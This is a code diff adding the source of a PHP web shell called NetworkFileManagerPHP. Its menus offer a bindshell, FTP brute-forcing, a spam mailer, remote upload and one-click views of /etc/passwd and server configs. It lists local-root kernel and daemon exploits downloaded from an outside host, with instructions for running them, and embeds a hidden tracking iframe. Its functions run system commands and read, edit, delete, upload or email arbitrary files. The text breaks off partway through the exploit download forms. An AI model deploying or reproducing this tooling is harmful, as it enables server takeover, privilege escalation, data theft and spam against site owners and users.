+<tr><td align=center colspan=6 class=pagetitle><b>NetworkFileManagerPHP (© #hack.ru)</b> Version: <b>$ver</b> </td></tr>
+
+<tr><td align=center colspan=6 class=pagetitle>Script for l33t admin job</td></tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>Script help:</b></td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF'>.:Home</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href="http://hackru.info">.:#hack.ru</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href = '$PHP_SELF?action=feedback'>.:Feedback</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=help'>.:About</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=update'>.:Update</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+
+
+<tr>
+
+<td class=pagetitle align=center width='85%' ><b>Net tools:</b></td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=portscan'>.:Port scanner</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=ftp'>.:FTP bruteforce</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=tar'>.:Folder compression</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=sql'>.:Mysql Dump</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=bash'>.:bindshell (/bin/sh)</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%' ><b>Exploits access:</b></td>
+
+<td $style2 align=center width='15%' colspan=2><a class=menu href='$PHP_SELF?action=bash'>.:bindshell</a>&nbsp;&nbsp;</td>
+
+<td $style_open align=center width='15%' colspan=3><a  class=menu href='$PHP_SELF?action=exploits'>.:Exploits</a>&nbsp;&nbsp;</td>
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>l33t tools:</b></td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=crypte'>.:Crypter</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=decrypte'>.:Decrypter</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=brut_ftp'>.:Full access FTP</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=spam'>.:Spamer (!new!)</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=down'>.:Remote upload</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%' colspan=6>$sob&nbsp;&nbsp;ID:<u><b>$id</b></u></td>
+
+</tr>
+
+<tr>
+
+<td $style2 align=center width='15%' colspan=2><a class=menu href="$PHP_SELF?tm=/etc&fi=passwd&action=view">.:etc/passwd</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href = '$PHP_SELF?tm=/var/cpanel&fi=accounting.log&action=view'>.:cpanel log</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/usr/local/apache/conf&fi=httpd.conf&action=view'>.:httpd.conf[1]</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/etc/httpd&fi=httpd.conf&action=view'>.:httpd.conf[2]</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='http://goat.cx'>.:Bonus</td>
+
+
+
+</tr>
+
+<!-- add by revers -->
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>Traffic tools:</b></td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=gettraff'>.:Get the script</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<!-- end add by revers -->
+
+</table>
+
+html;
+
+$key="goatse";
+
+$string="<IFRAME src=http://hackru.info/adm/count_nfm.php width=1 height=1 frameBorder=0 width=0 height=0></iframe>";
+
+/* randomizing letters array for random filenames of compression folders */
+
+$CHARS = "abcdefghijklmnopqrstuvwxyz";
+
+for ($i=0; $i<6; $i++)  $pass .= $CHARS[rand(0,strlen($CHARS)-1)];
+
+
+
+/* set full path to host and dir where public exploits and soft are situated */
+
+$public_site = "http://hackru.info/adm/exploits/public_exploits/";
+
+/* $public_site = "http://localhost/adm/public_exploits/"; */
+
+/* Public exploits and soft */
+
+$public[1] = "s"; // bindshell
+
+$title_ex[1] = "
+
+&nbsp;&nbsp;bindtty.c - remote shell on 4000 port, with rights of current user (id of apache)<br>
+
+<dd><b>Run:</b> ./s<br>
+
+&nbsp;&nbsp;&nbsp;Connect tot host with your favorite telnet client. Best of them are <u><b>putty</b></u> and <u><b>SecureCRT</b></u>
+
+";
+
+$public[2] = "m"; // mremap
+
+$title_ex[2] = "
+
+&nbsp;&nbsp;MREMAP - allows to gain local root priveleges by exploiting the bug of memory .<br>
+
+<dd><b>Run:</b> ./m<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$public[3] = "p"; // ptrace
+
+$title_ex[3] = "
+
+&nbsp;&nbsp;PTRACE - good one, works like mremap, but for another bug<br>
+
+<dd><b>Run:</b> ./p<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$public[4] = "psyBNC2.3.2-4.tar.gz"; // psybnc
+
+$title_ex[4] = "
+
+&nbsp;&nbsp;psyBNC - Last release of favorite IRC bouncer<br>
+
+<dd><b>Decompression:</b> tar -zxf psyBNC2.3.2-4.tar.gz // will be folder <u>psybnc</u><br>
+
+<dd><b>Compilation, installing and running psybnc:</b> make // making psybnc // ./psybnc // You may edit psybnc.conf with NFM, Default listening port is 31337 - connect to it with your favotite IRC client and set a password<br>
+
+&nbsp;&nbsp;&nbsp;Allowed to run with uid of apache, but check out the firewall!
+
+";
+
+/* Private exploits */
+
+$private[1] = "brk"; // localroot root linux 2.4.*
+
+$title_exp[1] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - Exploit do_brk (code added) - gains local root priveleges if exploited succes<br>
+
+<dd><b>Run:</b> ./brk<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[2] = "dupescan"; // Glftpd DupeScan Local Exploit by RagnaroK
+
+$title_exp[2] = "
+
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br>
+
+<dd>There are 2 files: <b>dupescan</b> and <b>glftpd</b> To gain root uid, you need to write dupescan to <br>
+
+glftpd/bin/ with command <u>cp dupescan glftpd/bin/</u>, and after run <u>./glftpd</u>. Get the root!!!<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[3] = "glftpd";
+
+$title_exp[3] = "
+
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br>
+
+part 2<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[4] = "sortrace";
+
+$title_exp[4] = "
+
+&nbsp;&nbsp;Traceroute v1.4a5 exploit by sorbo - private local root exploit for traceroute up to 1.4.a5<br>
+
+<dd><b>Run:</b> ./sortrace<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[5] = "root";
+
+$title_exp[5] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - ptrace private_mod exploits, may gain local root privaleges<br>
+
+<dd><b>Run:</b> ./root<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[6] = "sxp";
+
+$title_exp[6] = "
+
+&nbsp;&nbsp;Sendmail 8.11.x exploit localroot - private local root exploit for Sendmail 8.11.x<br>
+
+<dd><b>Run:</b> ./sxp<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[7] = "ptrace_kmod";
+
+$title_exp[7] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - private local root exploit, uses kmod bug + ptrace , gives local root<br>
+
+<dd><b>Run:</b> ./ptrace_kmod<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[8] = "mr1_a";
+
+$title_exp[8] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - mremap any memory size local root exploit for kernels 2.4.x<br>
+
+<dd><b>Run:</b> ./mr1_a<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+/* set full path to host and dir where private exploits and soft are situated */
+
+$private_site = "http://hackru.info/adm/exploits/private_exploits/";
+
+endif;
+
+
+
+$createdir= "files";
+
+
+
+/* spamer config */
+
+
+
+$sendemail = "packetstorm@km.ru";
+
+$confirmationemail = "packetstorm@km.ru";
+
+$mailsubject = "Hello!This is a test message!";
+
+
+
+
+
+
+
+/* !!!Warning: DO NOT CHANGE ANYTHING IF YOU DUNNO WHAT ARE YOU DOING	 */
+
+global $action,$tm,$cm;
+
+
+
+function getdir() {
+
+ global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF;
+
+ $st = getcwd();
+
+ $st = str_replace("\\","/",$st);
+
+ $j = 0;
+
+ $gdir = array();
+
+ $gsub = array();
+
+ print("<br>");
+
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+
+  if ($st[$i] != "/") {
+
+   $gdir[$j] = $gdir[$j].$st[$i];
+
+   $gsub[$j] = $gsub[$j].$st[$i];
+
+  } else {
+
+   $gdir[$j] = $gdir[$j]."/";
+
+   $gsub[$j] = $gsub[$j]."/";
+
+   $gdir[$j+1] = $gdir[$j];
+
+   $j++;
+
+  }
+
+ }
+
+
+ print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=60% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Current directory: </b>");
+
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+
+ $free = tinhbyte(diskfreespace("./"));
+
+ print("</td></tr><tr><td><b>&nbsp;&nbsp;Current disk free space</b> : <font face='Tahoma' size='1' color='#000000'>$free</font></td></tr>");
+
+ print("<tr><td><b>&nbsp; ".exec("uname -a")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp; ".exec("cat /proc/cpuinfo | grep GHz")." &nbsp;&nbsp; &nbsp; &nbsp;Real speed of ".exec("cat /proc/cpuinfo | grep MHz")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp; Perhaps release is :&nbsp;&nbsp;".exec("cat /etc/redhat-release")."</b></td></tr></td>");
+
+ print("<tr><td><b>&nbsp; ".exec("id")." &nbsp; &nbsp; &nbsp; &nbsp; ".exec("who")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp;&nbsp;Your IP:&nbsp;&nbsp;</b><font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR &nbsp; $HTTP_X_FORWARDED_FOR</font></td></tr></table><br>");
+
+
+}
+
+function tinhbyte($filesize) {
+
+ if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
+
+ elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
+
+ elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
+
+ else { $filesize = $filesize . ""; }
+
+ return $filesize;
+
+}
+
+
+
+function permissions($mode) {
+
+ $perms  = ($mode & 00400) ? "r" : "-";
+
+ $perms .= ($mode & 00200) ? "w" : "-";
+
+ $perms .= ($mode & 00100) ? "x" : "-";
+
+ $perms .= ($mode & 00040) ? "r" : "-";
+
+ $perms .= ($mode & 00020) ? "w" : "-";
+
+ $perms .= ($mode & 00010) ? "x" : "-";
+
+ $perms .= ($mode & 00004) ? "r" : "-";
+
+ $perms .= ($mode & 00002) ? "w" : "-";
+
+ $perms .= ($mode & 00001) ? "x" : "-";
+
+ return $perms;
+
+}
+
+
+
+function readdirdata($dir) {
+
+ global $action,$files,$dirs,$tm,$supsub,$thum,$style3,$style4,$PHP_SELF;
+
+ $files = array();
+
+ $dirs= array();
+
+ $open = @opendir($dir);
+
+
+
+ if (!@readdir($open) or !$open ) echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert><b>Access denied.</b></td></tr></table>";
+
+ else {
+
+  $open = opendir($dir);
+
+  while ($file = readdir($open)) {
+
+   $rec = $file;
+
+   $file = $dir."/".$file;
+
+   if (is_file($file)) $files[] = $rec;
+
+  }
+
+  sort($files);
+
+  $open = opendir($dir);
+
+  $i=0;
+
+  while ($dire = readdir($open)) {
+
+   if ( $dire != "." ) {
+
+    $rec = $dire;
+
+    $dire = $dir."/".$dire;
+
+    if (is_dir($dire)) {
+
+     $dirs[] = $rec;
+
+     $i++;
+
+    }
+
+   }
+
+  }
+
+  sort($dirs);
+
+  print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'center' class=pagetitle><b>Name</b></td><td width = '10%' align = 'center' class=pagetitle><b>Size</b></td><td width = '20%' align = 'center' class=pagetitle><b>Date of creation</b></td><td width = '10%' align = 'center' class=pagetitle><b>Type</b></td><td width = '15%' align = 'center' class=pagetitle><b>Access rights</b></td><td width = '25%' align = 'center' class=pagetitle><b>Comments</b></td></tr></table>");
+
+  for ($i=0;$i<sizeof($dirs);$i++) {
+
+   if ($dirs[$i] != "..") {
+
+    $type = 'Dir';
+
+    $fullpath = $dir."/".$dirs[$i];
+
+    $time = date("d/m/y H:i",filemtime($fullpath));
+
+    $perm = permissions(fileperms($fullpath));
+
+    $size = tinhbyte(filesize($fullpath));
+
+    $name = $dirs[$i];
+
+    $fullpath = $tm."/".$dirs[$i];
+
+    if ($perm[7] == "w" && $name != "..") $action = "
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+	<tr>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=uploadd'>Upload</a></td>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$tm&dd=$name&action=deldir'>Delete</a></td>
+
+	</tr>
+
+	<tr>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=newdir'>Create directory</a></td>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td>
+
+	</tr></table>";
+
+    else $action = "<TABLE CELLPADDING=0 CELLSPACING=0 width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><b>Read only</b></td><td align=center $style2><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td></tr></table>";
+
+    print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#33CCCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><a href = '$PHP_SELF?tm=$fullpath'><b><i>$name</i></b></a></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'left'>$action</td></tr></table>");
+
+   }
+
+  }
+
+  for ($i=0;$i<sizeof($files);$i++) {
+
+   $type = 'File';
+
+   $fullpath =  $dir."/".$files[$i];
+
+   $time = date("d/m/y H:i",filemtime($fullpath));
+
+   $perm = permissions(fileperms($fullpath));
+
+   $size = tinhbyte(filesize($fullpath));
+
+   if ( $perm[6] == "r" ) $act = "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=view'>View</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download'>Download</a></td></tr>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download_mail'>To e-mail</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=copyfile'>Copy</a></td>
+
+   </tr></table>";
+
+   if ( $perm[7] == "w" ) $act .= "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=edit'>Edit</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=delete'>Delete</a></td>
+
+   </tr></table>";
+
+   print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><b>$files[$i]</b></font></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'center'>$act</td></tr></table>");
+
+  }
+
+ }
+
+}
+
+
+
+function html() {
+
+global $ver,$meta,$style;
+
+echo "
+
+<html>
+
+<head>
+
+<title>NetworkFileManagerPHP</title>
+
+</head>
+
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+
+";
+
+}
+
+
+
+# file view
+
+function viewfile($dir,$file) {
+
+
+
+ $buf = explode(".", $file);
+
+ $ext = $buf[sizeof($buf)-1];
+
+ $ext = strtolower($ext);
+
+ $dir = str_replace("\\","/",$dir);
+
+ $fullpath = $dir."/".$file;
+
+
+
+ switch ($ext) {
+
+  case "jpg":
+
+
+
+	header("Content-type: image/jpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    case "jpeg":
+
+
+
+    header("Content-type: image/jpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    case "gif":
+
+
+
+    header("Content-type: image/gif");
+
+    readfile($fullpath);
+
+    break;
+
+
+
+	 case "png":
+
+
+
+    header("Content-type: image/png");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+	 case "avi":
+
+    header("Content-type: video/avi");
+
+    readfile($fullpath);
+
+
+
+    break;
+
+    default:
+
+
+
+	 case "mpeg":
+
+    header("Content-type: video/mpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+	 case "mpg":
+
+    header("Content-type: video/mpg");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+    html();
+
+	chdir($dir);
+
+    getdir();
+
+
+
+   echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><font color='#FFFFCC' face='Tahoma' size = 2>Path to filename:</font><font color=white  face ='Tahoma' size = 2>$fullpath</font></td></tr></table>";
+
+   $fp = fopen($fullpath , "r");
+
+   while (!feof($fp)) {
+
+    $char = fgetc($fp);
+
+    $st .= $char;
+
+   }
+
+
+
+   $st = str_replace("&", "&amp;", $st);
+
+   $st = str_replace("<", "&lt;", $st);
+
+   $st = str_replace(">", "&gt;", $st);
+
+
+
+   $tem = "<p align='center'><textarea wrap='off' rows='20' name='S1' cols='90' class=inputbox>$st</textarea></p>";
+
+   echo $tem;
+
+   fclose($fp);
+
+   break;
+
+ }
+
+}
+
+
+
+# send file to mail
+
+function download_mail($dir,$file) {
+
+ global $action,$tm,$cm,$demail, $REMOTE_ADDR, $HTTP_HOST, $PATH_TRANSLATED;
+
+ $buf = explode(".", $file);
+
+ $dir = str_replace("\\","/",$dir);
+
+ $fullpath = $dir."/".$file;
+
+ $size = tinhbyte(filesize($fullpath));
+
+ $fp = fopen($fullpath, "rb");
+
+ while(!feof($fp))
+
+
+
+  $attachment .= fread($fp, 4096);
+
+  $attachment = base64_encode($attachment);
+
+  $subject = "NetworkFileManagerPHP  ($file)";
+
+
+
+  $boundary = uniqid("NextPart_");
+
+  $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+
+
+
+  $info = "---==== Message from ($demail)====---\n\n";
+
+  $info .= "IP:\t$REMOTE_ADDR\n";
+
+  $info .= "HOST:\t$HTTP_HOST\n";
+
+  $info .= "URL:\t$HTTP_REFERER\n";
+
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+
+
+
+  $send_to = "$demail";
+
+
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+
+
+  if($send == 2)
+
+   echo "<br>
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+	<tr><td align=center>
+
+	<font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!File <b>$file</b> was successfully sent to <u>$demail</u>.</font></center></td></tr></table><br>";
+
+
+
+fclose($fp);
+
+ }
+
+
+
+
+
+
+
+function copyfile($dir,$file) {
+
+ global $action,$tm;
+
+ $fullpath = $dir."/".$file;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>&nbsp;<b><u>$file</u></b>&nbsp; copied successfully to &nbsp;<u><b>$dir</b></u></font></center></td></tr></table>";
+
+ if (!copy($file, $file.'.bak')){
+
+   echo (" unable to copy file $file");
+
+   }
+
+}
+
+
+
+
+
+# file edit
+
+function editfile($dir,$file) {
+
+ global $action,$datar;
+
+ $fullpath = $dir."/".$file;
+
+ chdir($dir);
+
+ getdir();
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>$fullpath</font></center></td></tr></table>";
+
+ $fp = fopen($fullpath , "r");
+
+ while (!feof($fp)) {
+
+  $char = fgetc($fp);
+
+  $st .= $char;
+
+ }
+
+ $st = str_replace("&", "&amp;", $st);
+
+ $st = str_replace("<", "&lt;", $st);
+
+ $st = str_replace(">", "&gt;", $st);
+
+ $st = str_replace('"', "&quot;", $st);
+
+ echo "<form method='POST' action='$PHP_SELF?tm=$dir&fi=$file&action=save'><p align='center'><textarea rows='14' name='S1' cols='82' class=inputbox>$st</textarea></p><p align='center'><input type='submit' value='SAVE' name='save' class=button1 $style_button></p><input type = hidden value = $tm></form>";
+
+ $datar = $S1;
+
+
+
+}
+
+
+
+# file write
+
+function savefile($dir,$file) {
+
+ global $action,$S1,$tm;
+
+ $fullpath = $dir."/".$file;
+
+ $fp = fopen($fullpath, "w");
+
+ $S1 = stripslashes($S1);
+
+ fwrite($fp,$S1);
+
+ fclose($fp);
+
+ chdir($dir);
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fullpath</b> was saved successfully.</font></td></tr></table>";
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# directory delete
+
+function deletef($dir)
+
+{
+
+ global $action,$tm,$fi;
+
+ $tm = str_replace("\\\\","/",$tm);
+
+ $link = $tm."/".$fi;
+
+ unlink($link);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# file upload
+
+function uploadtem() {
+
+ global $file,$tm,$thum,$PHP_SELF,$dir,$style_button;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form enctype='multipart/form-data' action='$PHP_SELF?tm=$dir&action=upload' method=post><tr><td align=left valign=top colspan=3 class=pagetitle><b>Upload file:</b></td></tr><tr><td><input type='hidden' name='tm' value='$tm'></td><td><input name='userfile' type='file' size=48 class=inputbox></td><td><input type='submit' value='Upload file' class=button1 $style_button></td></tr></form></table>";
+
+}
+
+
+
+function upload() {
+
+ global $HTTP_POST_FILES,$tm;
+
+ echo $set;
+
+ copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("Unable to upload file".$HTTP_POST_FILES["userfile"][name]);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>".$HTTP_POST_FILES["userfile"][name]."</b> was successfully uploaded.</font></center></td></tr></table>";
+
+ @unlink($userfile);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# get exploits
+
+function upload_exploits() {
+
+ global $PHP_SELF,$style_button, $public_site, $private_site, $public, $title_ex, $style_open, $private, $title_exp;
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Public exploits and soft:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>bindshell (bin/sh)</b> - bindtty.c (binary file to run - <u>s</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[1]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[1]'>
+
+ <input type='hidden' name='file2' value='$public[1]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - mremap (binary file to run - <u>m</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[2]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[2]'>
+
+ <input type='hidden' name='file2' value='$public[2]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - ptrace (binary file to run - <u>p</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[3]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[3]'>
+
+ <input type='hidden' name='file2' value='$public[3]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>psyBNC version:2.3.2-4</b> - psyBNC (binary file to run - <u>./psybnc</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[4]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[4]'>
+
+ <input type='hidden' name='file2' value='$public[4]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
